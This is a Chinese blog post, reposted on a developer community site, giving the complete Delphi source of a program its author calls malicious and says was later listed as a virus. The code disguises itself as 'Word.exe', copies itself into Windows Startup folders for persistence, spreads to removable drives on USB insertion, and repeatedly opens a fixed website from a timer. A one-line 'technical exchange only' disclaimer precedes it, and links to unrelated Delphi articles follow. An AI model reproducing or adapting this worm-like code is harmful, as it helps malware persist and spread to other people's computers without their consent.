开发者社区> 技术小阿哥> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

一个delphi开发的恶意程序代码

简介:
+关注继续查看
这个delphi程序是去年上半年为了测试病毒和病毒代码库所做的恶意程序,功能有:程序运行后,会将自己添加到系统启动项中,如果有u盘接入,会自动copy自己到优盘上,还可以在指定时间内,在系统后台进行某些操作,比如打开网页什么的,该程序已经在去年被列为病毒了。本文只做技术交流,请勿用于非法用途,出现任何问题,本人概不负责。下面时代码,dephi7开发,用了一个timer控件:
unit Unit1;
interface
uses
    Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
  Dialogs,ShellApi,StdCtrls, ExtCtrls;
type
  TForm1 = class(TForm)
    Timer1: TTimer;
    procedure FormCreate(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
  private
    { Private declarations }
    procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
  public
    { Public declarations }
  end;
var
  Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.WMDeviceChange (var Msg: TMessage);
var
   //myMsg : String;
   m_Result,i:Integer;
   str_temp:string;
   buf:array   [0..MAX_PATH-1]   of   char;
begin
   Case Msg.WParam of
   32768:
begin
   //myMsg :='U盘插入';
   //Label1.Caption:=myMsg;
  m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
     for i:=0 to (m_Result div 4) do
  begin
        str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
         if getdrivetype(pchar(str_temp)) = DRIVE_CDROM  then
         begin
            if  str_temp ='E:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('F:\Word.exe'),False);
            if  str_temp ='F:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('G:\Word.exe'),False);
            if  str_temp ='G:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('H:\Word.exe'),False);
            if  str_temp ='H:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('I:\Word.exe'),False);
   end;
   end;
   end;
   32772:
begin
   //myMsg :='U盘拔出';
   //Label1.Caption:=myMsg;
end;
   end;
end;
 
procedure TForm1.FormCreate(Sender: TObject);
begin
if fileexists('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Word.exe') and fileexists('C:\Documents and Settings\new\「开始」菜单\程序\启动\Word.exe')then
else
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Word.exe'),False);
//FileSetAttr('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Word.exe',FILE_ATTRIBUTE_HIDDEN);
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\new\「开始」菜单\程序\启动\Word.exe'),False);
//FileSetAttr('C:\Documents and Settings\new\「开始」菜单\程序\启动\Word.exe',FILE_ATTRIBUTE_HIDDEN);
end;
procedure TForm1.Timer1Timer(Sender: TObject);
var

  strurl:string;
begin
  StrUrl:='http://www.cnking.org';
  ShellExecute(0,'open',pchar(StrUrl),nil,nil,SW_SHOW);
  end;

end.




本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/313303,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
使用delphi 开发 web(二)动态脚本的实现
看了前面的文章同学,都会认为delphi 开发web比较麻烦,没有PHP 和ASP 方便。 因为每次要改动网页的内容,就要重新编译一次,重新发布一次,这样也太麻烦了。那么我们就 做一个类似PHP 的动态web 服务器吧,一次编译发布后,就不用再改了,网站内容需要变化时,只 需要修改脚本就可以了。
930 0
delphi with(开域)语句的介绍
with语句又叫开域语句。 with语句引用一个记录域、一个对象和方法的捷径,在一个with语句中,一个或多个指定记录的域,只可以借助域标识符来引用,with语句语法 with obj1 do statement 或with obje1,obje2...objn do statement 这里obj是表示一个对象或记录的引用,statement是任何简单语句或结构语句 wiht语句说明: 如果可能,with语句中的每个变量引用或方法名称都被作为指定对象或记录的成员解释。
554 0
Delphi的TScreen类
    TScreen 类 - 获取字体列表 unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Fo...
866 0
056_《Delphi应用程序开发精彩实例》
《Delphi应用程序开发精彩实例》 Delphi 教程 系列书籍 (056) 《Delphi应用程序开发精彩实例》 网友(邦)整理 EMail: shuaihj@163.
1407 0
Delphi使用VB控件全攻略
 前言     在最近几周的工作里,始终被一个头疼的问题所困扰,那就是VB6编写的ActiveX控件在Delphi环境下存在着诸多稀奇古怪的问题,几经周折,终于在搜索了几乎全部的论坛、资料后,找到了针对不同Delphi版本发生的问题的解决办法。
609 0
Delphi实现网页表单数据的自动提交
    MSHTML是微软公司的一个COM组件,该组件封装了HTML语言中的所有元素及其属性,通过其提供的标准接口,可以访问指定网页的所有元素. MSHTML对象模型是由一些对象和集合组成的.处于根部的是HTML,描述了打开页面的1个窗口,包括一系列集合和对象。如Frames集合,History,Location,Navigator,Document,Vi—sum,Event对象等.其中
898 0
文章
问答
文章排行榜
最热
最新
相关电子书
更多
代码未写,漏洞已出——谈谈设计不当导致的安全问题
立即下载
15分钟打造你自己的小程序更新版
立即下载
代码未写,漏洞已出
立即下载